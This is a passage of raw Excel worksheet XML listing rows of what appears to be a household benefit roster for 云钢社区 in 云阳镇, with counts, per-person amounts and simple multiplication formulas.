      </c>
      <c r="E1662" s="43" t="s">
        <v>4460</v>
      </c>
      <c r="F1662" s="24" t="str">
        <f>F1661</f>
        <v>4113210599</v>
      </c>
      <c r="G1662" s="24"/>
      <c r="H1662" s="24"/>
      <c r="I1662" s="24">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
      <c r="J1662" s="24"/>
      <c r="K1662" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1663" customHeight="1" spans="1:11">
      <c r="A1663" s="23" t="s">
        <v>4461</v>
      </c>
      <c r="B1663" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1663" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1663" s="24" t="s">
        <v>4462</v>
      </c>
      <c r="E1663" s="24" t="s">
        <v>4463</v>
      </c>
      <c r="F1663" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1663" s="24">
        <v>1</v>
      </c>
      <c r="H1663" s="25">
        <v>365</v>
      </c>
      <c r="I1663" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1663" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1663" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1664" customHeight="1" spans="1:11">
      <c r="A1664" s="23" t="s">
        <v>4464</v>
      </c>
      <c r="B1664" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1664" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1664" s="24" t="s">
        <v>4465</v>
      </c>
      <c r="E1664" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1664" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1664" s="24">
        <v>1</v>
      </c>
      <c r="H1664" s="25">
        <v>365</v>
      </c>
      <c r="I1664" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1664" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1664" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1665" customHeight="1" spans="1:11">
      <c r="A1665" s="23" t="s">
        <v>4466</v>
      </c>
      <c r="B1665" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1665" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1665" s="24" t="s">
        <v>4467</v>
      </c>
      <c r="E1665" s="24" t="s">
        <v>4468</v>
      </c>
      <c r="F1665" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1665" s="24">
        <v>1</v>
      </c>
      <c r="H1665" s="25">
        <v>365</v>
      </c>
      <c r="I1665" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1665" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1665" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1666" customHeight="1" spans="1:11">
      <c r="A1666" s="23" t="s">
        <v>4469</v>
      </c>
      <c r="B1666" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1666" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1666" s="24" t="s">
        <v>4470</v>
      </c>
      <c r="E1666" s="24" t="s">
        <v>3493</v>
      </c>
      <c r="F1666" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1666" s="24">
        <v>1</v>
      </c>
      <c r="H1666" s="25">
        <v>365</v>
      </c>
      <c r="I1666" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1666" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1666" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1667" customHeight="1" spans="1:11">
      <c r="A1667" s="23" t="s">
        <v>4471</v>
      </c>
      <c r="B1667" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1667" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1667" s="24" t="s">
        <v>4472</v>
      </c>
      <c r="E1667" s="24" t="s">
        <v>3344</v>
      </c>
      <c r="F1667" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1667" s="24">
        <v>1</v>
      </c>
      <c r="H1667" s="25">
        <v>365</v>
      </c>
      <c r="I1667" s="24">
        <f t="shared" si="25"/>
        <v>365</v>
      </c>
      <c r="J1667" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1667" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1668" customHeight="1" spans="1:11">
      <c r="A1668" s="23" t="s">
        <v>4473</v>
      </c>
      <c r="B1668" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1668" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1668" s="24" t="s">
        <v>4474</v>
      </c>
      <c r="E1668" s="24" t="s">
        <v>4475</v>
      </c>
      <c r="F1668" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1668" s="24">
        <v>1</v>
      </c>
      <c r="H1668" s="25">
        <v>365</v>
      </c>
      <c r="I1668" s="24">
        <f t="shared" ref="I1668:I1731" si="26">H1668*G1668</f>
        <v>365</v>
      </c>
      <c r="J1668" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1668" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1669" customHeight="1" spans="1:11">
      <c r="A1669" s="23" t="s">
        <v>4476</v>
      </c>
      <c r="B1669" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1669" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1669" s="24" t="s">
        <v>4477</v>
      </c>
      <c r="E1669" s="24" t="s">
        <v>4478</v>
      </c>
      <c r="F1669" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1669" s="24">
        <v>1</v>
      </c>
      <c r="H1669" s="25">
        <v>365</v>
      </c>
      <c r="I1669" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1669" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1669" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1670" customHeight="1" spans="1:11">
      <c r="A1670" s="23" t="s">
        <v>4479</v>
      </c>
      <c r="B1670" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1670" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1670" s="24" t="s">
        <v>4480</v>
      </c>
      <c r="E1670" s="24" t="s">
        <v>3695</v>
      </c>
      <c r="F1670" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1670" s="24">
        <v>1</v>
      </c>
      <c r="H1670" s="25">
        <v>365</v>
      </c>
      <c r="I1670" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1670" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1670" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1671" customHeight="1" spans="1:11">
      <c r="A1671" s="23" t="s">
        <v>4481</v>
      </c>
      <c r="B1671" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1671" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1671" s="24" t="s">
        <v>4482</v>
      </c>
      <c r="E1671" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1671" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1671" s="24">
        <v>1</v>
      </c>
      <c r="H1671" s="25">
        <v>365</v>
      </c>
      <c r="I1671" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1671" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1671" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1672" customHeight="1" spans="1:11">
      <c r="A1672" s="23" t="s">
        <v>4483</v>
      </c>
      <c r="B1672" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1672" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1672" s="24" t="s">
        <v>4484</v>
      </c>
      <c r="E1672" s="24" t="s">
        <v>4485</v>
      </c>
      <c r="F1672" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1672" s="24">
        <v>1</v>
      </c>
      <c r="H1672" s="25">
        <v>365</v>
      </c>
      <c r="I1672" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1672" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1672" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1673" customHeight="1" spans="1:11">
      <c r="A1673" s="23" t="s">
        <v>4486</v>
      </c>
      <c r="B1673" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1673" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1673" s="24" t="s">
        <v>4487</v>
      </c>
      <c r="E1673" s="24" t="s">
        <v>4488</v>
      </c>
      <c r="F1673" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1673" s="24">
        <v>2</v>
      </c>
      <c r="H1673" s="25">
        <v>325</v>
      </c>
      <c r="I1673" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1673" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1673" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1674" customHeight="1" spans="1:11">
      <c r="A1674" s="23" t="s">
        <v>4489</v>
      </c>
      <c r="B1674" s="24" t="str">
        <f>B1673</f>
        <v>云阳镇</v>
      </c>
      <c r="C1674" s="24" t="str">
        <f>C1673</f>
        <v>云钢社区</v>
      </c>
      <c r="D1674" s="43" t="s">
        <v>4490</v>
      </c>
      <c r="E1674" s="43" t="s">
        <v>3733</v>
      </c>
      <c r="F1674" s="24" t="str">
        <f>F1673</f>
        <v>4113210599</v>
      </c>
      <c r="G1674" s="24"/>
      <c r="H1674" s="24"/>
      <c r="I1674" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1674" s="24"/>
      <c r="K1674" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1675" customHeight="1" spans="1:11">
      <c r="A1675" s="23" t="s">
        <v>4491</v>
      </c>
      <c r="B1675" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1675" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1675" s="24" t="s">
        <v>4492</v>
      </c>
      <c r="E1675" s="24" t="s">
        <v>2494</v>
      </c>
      <c r="F1675" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1675" s="24">
        <v>1</v>
      </c>
      <c r="H1675" s="25">
        <v>365</v>
      </c>
      <c r="I1675" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1675" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1675" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1676" customHeight="1" spans="1:11">
      <c r="A1676" s="23" t="s">
        <v>4493</v>
      </c>
      <c r="B1676" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1676" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1676" s="24" t="s">
        <v>4494</v>
      </c>
      <c r="E1676" s="24" t="s">
        <v>4488</v>
      </c>
      <c r="F1676" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1676" s="24">
        <v>1</v>
      </c>
      <c r="H1676" s="25">
        <v>365</v>
      </c>
      <c r="I1676" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1676" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1676" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1677" customHeight="1" spans="1:11">
      <c r="A1677" s="23" t="s">
        <v>4495</v>
      </c>
      <c r="B1677" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1677" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1677" s="24" t="s">
        <v>4496</v>
      </c>
      <c r="E1677" s="24" t="s">
        <v>3727</v>
      </c>
      <c r="F1677" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1677" s="24">
        <v>1</v>
      </c>
      <c r="H1677" s="25">
        <v>365</v>
      </c>
      <c r="I1677" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1677" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1677" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1678" customHeight="1" spans="1:11">
      <c r="A1678" s="23" t="s">
        <v>4497</v>
      </c>
      <c r="B1678" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1678" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1678" s="24" t="s">
        <v>4498</v>
      </c>
      <c r="E1678" s="24" t="s">
        <v>3601</v>
      </c>
      <c r="F1678" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1678" s="24">
        <v>1</v>
      </c>
      <c r="H1678" s="25">
        <v>365</v>
      </c>
      <c r="I1678" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1678" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1678" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1679" customHeight="1" spans="1:11">
      <c r="A1679" s="23" t="s">
        <v>4499</v>
      </c>
      <c r="B1679" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1679" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1679" s="24" t="s">
        <v>4500</v>
      </c>
      <c r="E1679" s="24" t="s">
        <v>3872</v>
      </c>
      <c r="F1679" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1679" s="24">
        <v>1</v>
      </c>
      <c r="H1679" s="25">
        <v>365</v>
      </c>
      <c r="I1679" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1679" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1679" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1680" customHeight="1" spans="1:11">
      <c r="A1680" s="23" t="s">
        <v>4501</v>
      </c>
      <c r="B1680" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1680" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1680" s="24" t="s">
        <v>4502</v>
      </c>
      <c r="E1680" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F1680" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1680" s="24">
        <v>1</v>
      </c>
      <c r="H1680" s="25">
        <v>365</v>
      </c>
      <c r="I1680" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1680" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1680" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1681" customHeight="1" spans="1:11">
      <c r="A1681" s="23" t="s">
        <v>4503</v>
      </c>
      <c r="B1681" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1681" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1681" s="24" t="s">
        <v>4504</v>
      </c>
      <c r="E1681" s="24" t="s">
        <v>2841</v>
      </c>
      <c r="F1681" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1681" s="24">
        <v>2</v>
      </c>
      <c r="H1681" s="25">
        <v>325</v>
      </c>
      <c r="I1681" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1681" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1681" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1682" customHeight="1" spans="1:11">
      <c r="A1682" s="23" t="s">
        <v>4505</v>
      </c>
      <c r="B1682" s="24" t="str">
        <f>B1681</f>
        <v>云阳镇</v>
      </c>
      <c r="C1682" s="24" t="str">
        <f>C1681</f>
        <v>云钢社区</v>
      </c>
      <c r="D1682" s="43" t="s">
        <v>4506</v>
      </c>
      <c r="E1682" s="43" t="s">
        <v>4366</v>
      </c>
      <c r="F1682" s="24" t="str">
        <f>F1681</f>
        <v>4113210599</v>
      </c>
      <c r="G1682" s="24"/>
      <c r="H1682" s="24"/>
      <c r="I1682" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1682" s="24"/>
      <c r="K1682" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1683" customHeight="1" spans="1:11">
      <c r="A1683" s="23" t="s">
        <v>4507</v>
      </c>
      <c r="B1683" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1683" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1683" s="24" t="s">
        <v>4508</v>
      </c>
      <c r="E1683" s="24" t="s">
        <v>4509</v>
      </c>
      <c r="F1683" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1683" s="24">
        <v>1</v>
      </c>
      <c r="H1683" s="25">
        <v>365</v>
      </c>
      <c r="I1683" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1683" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1683" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1684" customHeight="1" spans="1:11">
      <c r="A1684" s="23" t="s">
        <v>4510</v>
      </c>
      <c r="B1684" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1684" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1684" s="24" t="s">
        <v>4511</v>
      </c>
      <c r="E1684" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1684" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1684" s="24">
        <v>1</v>
      </c>
      <c r="H1684" s="25">
        <v>365</v>
      </c>
      <c r="I1684" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1684" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1684" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1685" customHeight="1" spans="1:11">
      <c r="A1685" s="23" t="s">
        <v>4512</v>
      </c>
      <c r="B1685" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1685" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1685" s="24" t="s">
        <v>4513</v>
      </c>
      <c r="E1685" s="24" t="s">
        <v>4514</v>
      </c>
      <c r="F1685" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1685" s="24">
        <v>1</v>
      </c>
      <c r="H1685" s="25">
        <v>365</v>
      </c>
      <c r="I1685" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1685" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1685" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1686" customHeight="1" spans="1:11">
      <c r="A1686" s="23" t="s">
        <v>4515</v>
      </c>
      <c r="B1686" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1686" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1686" s="24" t="s">
        <v>4516</v>
      </c>
      <c r="E1686" s="24" t="s">
        <v>3546</v>
      </c>
      <c r="F1686" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1686" s="24">
        <v>1</v>
      </c>
      <c r="H1686" s="25">
        <v>365</v>
      </c>
      <c r="I1686" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1686" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1686" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1687" customHeight="1" spans="1:11">
      <c r="A1687" s="23" t="s">
        <v>4517</v>
      </c>
      <c r="B1687" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1687" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1687" s="24" t="s">
        <v>4518</v>
      </c>
      <c r="E1687" s="24" t="s">
        <v>3242</v>
      </c>
      <c r="F1687" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1687" s="24">
        <v>2</v>
      </c>
      <c r="H1687" s="25">
        <v>325</v>
      </c>
      <c r="I1687" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1687" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1687" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1688" customHeight="1" spans="1:11">
      <c r="A1688" s="23" t="s">
        <v>4519</v>
      </c>
      <c r="B1688" s="24" t="str">
        <f>B1687</f>
        <v>云阳镇</v>
      </c>
      <c r="C1688" s="24" t="str">
        <f>C1687</f>
        <v>云钢社区</v>
      </c>
      <c r="D1688" s="43" t="s">
        <v>4520</v>
      </c>
      <c r="E1688" s="43" t="s">
        <v>4521</v>
      </c>
      <c r="F1688" s="24" t="str">
        <f>F1687</f>
        <v>4113210599</v>
      </c>
      <c r="G1688" s="24"/>
      <c r="H1688" s="24"/>
      <c r="I1688" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1688" s="24"/>
      <c r="K1688" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1689" customHeight="1" spans="1:11">
      <c r="A1689" s="23" t="s">
        <v>4522</v>
      </c>
      <c r="B1689" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1689" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1689" s="24" t="s">
        <v>4523</v>
      </c>
      <c r="E1689" s="24" t="s">
        <v>3786</v>
      </c>
      <c r="F1689" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1689" s="24">
        <v>1</v>
      </c>
      <c r="H1689" s="25">
        <v>365</v>
      </c>
      <c r="I1689" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1689" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1689" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1690" customHeight="1" spans="1:11">
      <c r="A1690" s="23" t="s">
        <v>4524</v>
      </c>
      <c r="B1690" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1690" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1690" s="24" t="s">
        <v>4525</v>
      </c>
      <c r="E1690" s="24" t="s">
        <v>4526</v>
      </c>
      <c r="F1690" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1690" s="24">
        <v>1</v>
      </c>
      <c r="H1690" s="25">
        <v>365</v>
      </c>
      <c r="I1690" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1690" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1690" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1691" customHeight="1" spans="1:11">
      <c r="A1691" s="23" t="s">
        <v>4527</v>
      </c>
      <c r="B1691" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1691" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1691" s="24" t="s">
        <v>4528</v>
      </c>
      <c r="E1691" s="24" t="s">
        <v>4529</v>
      </c>
      <c r="F1691" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1691" s="24">
        <v>1</v>
      </c>
      <c r="H1691" s="25">
        <v>365</v>
      </c>
      <c r="I1691" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1691" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1691" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1692" customHeight="1" spans="1:11">
      <c r="A1692" s="23" t="s">
        <v>4530</v>
      </c>
      <c r="B1692" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1692" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1692" s="24" t="s">
        <v>4531</v>
      </c>
      <c r="E1692" s="24" t="s">
        <v>4532</v>
      </c>
      <c r="F1692" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1692" s="24">
        <v>1</v>
      </c>
      <c r="H1692" s="25">
        <v>365</v>
      </c>
      <c r="I1692" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1692" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1692" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1693" customHeight="1" spans="1:11">
      <c r="A1693" s="23" t="s">
        <v>4533</v>
      </c>
      <c r="B1693" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1693" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1693" s="24" t="s">
        <v>4534</v>
      </c>
      <c r="E1693" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1693" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1693" s="24">
        <v>1</v>
      </c>
      <c r="H1693" s="25">
        <v>365</v>
      </c>
      <c r="I1693" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1693" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1693" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1694" customHeight="1" spans="1:11">
      <c r="A1694" s="23" t="s">
        <v>4535</v>
      </c>
      <c r="B1694" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1694" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1694" s="24" t="s">
        <v>4536</v>
      </c>
      <c r="E1694" s="24" t="s">
        <v>425</v>
      </c>
      <c r="F1694" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1694" s="24">
        <v>1</v>
      </c>
      <c r="H1694" s="25">
        <v>365</v>
      </c>
      <c r="I1694" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1694" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1694" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1695" customHeight="1" spans="1:11">
      <c r="A1695" s="23" t="s">
        <v>4537</v>
      </c>
      <c r="B1695" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1695" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1695" s="24" t="s">
        <v>4538</v>
      </c>
      <c r="E1695" s="24" t="s">
        <v>4539</v>
      </c>
      <c r="F1695" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1695" s="24">
        <v>1</v>
      </c>
      <c r="H1695" s="25">
        <v>365</v>
      </c>
      <c r="I1695" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1695" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1695" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1696" customHeight="1" spans="1:11">
      <c r="A1696" s="23" t="s">
        <v>4540</v>
      </c>
      <c r="B1696" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1696" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1696" s="24" t="s">
        <v>4541</v>
      </c>
      <c r="E1696" s="24" t="s">
        <v>3673</v>
      </c>
      <c r="F1696" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1696" s="24">
        <v>1</v>
      </c>
      <c r="H1696" s="25">
        <v>365</v>
      </c>
      <c r="I1696" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1696" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1696" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1697" customHeight="1" spans="1:11">
      <c r="A1697" s="23" t="s">
        <v>4542</v>
      </c>
      <c r="B1697" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1697" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1697" s="24" t="s">
        <v>4543</v>
      </c>
      <c r="E1697" s="24" t="s">
        <v>3644</v>
      </c>
      <c r="F1697" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1697" s="24">
        <v>1</v>
      </c>
      <c r="H1697" s="25">
        <v>365</v>
      </c>
      <c r="I1697" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1697" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1697" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1698" customHeight="1" spans="1:11">
      <c r="A1698" s="23" t="s">
        <v>4544</v>
      </c>
      <c r="B1698" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1698" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1698" s="24" t="s">
        <v>4545</v>
      </c>
      <c r="E1698" s="24" t="s">
        <v>2841</v>
      </c>
      <c r="F1698" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1698" s="24">
        <v>1</v>
      </c>
      <c r="H1698" s="25">
        <v>365</v>
      </c>
      <c r="I1698" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1698" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1698" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1699" customHeight="1" spans="1:11">
      <c r="A1699" s="23" t="s">
        <v>4546</v>
      </c>
      <c r="B1699" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1699" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1699" s="24" t="s">
        <v>4547</v>
      </c>
      <c r="E1699" s="24" t="s">
        <v>3489</v>
      </c>
      <c r="F1699" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1699" s="24">
        <v>3</v>
      </c>
      <c r="H1699" s="25">
        <v>290</v>
      </c>
      <c r="I1699" s="24">
        <f t="shared" si="26"/>
        <v>870</v>
      </c>
      <c r="J1699" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1699" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1700" customHeight="1" spans="1:11">
      <c r="A1700" s="23" t="s">
        <v>4548</v>
      </c>
      <c r="B1700" s="24" t="str">
        <f>B1699</f>
        <v>云阳镇</v>
      </c>
      <c r="C1700" s="24" t="str">
        <f>C1699</f>
        <v>云钢社区</v>
      </c>
      <c r="D1700" s="43" t="s">
        <v>4549</v>
      </c>
      <c r="E1700" s="43" t="s">
        <v>3826</v>
      </c>
      <c r="F1700" s="24" t="str">
        <f>F1699</f>
        <v>4113210599</v>
      </c>
      <c r="G1700" s="24"/>
      <c r="H1700" s="24"/>
      <c r="I1700" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
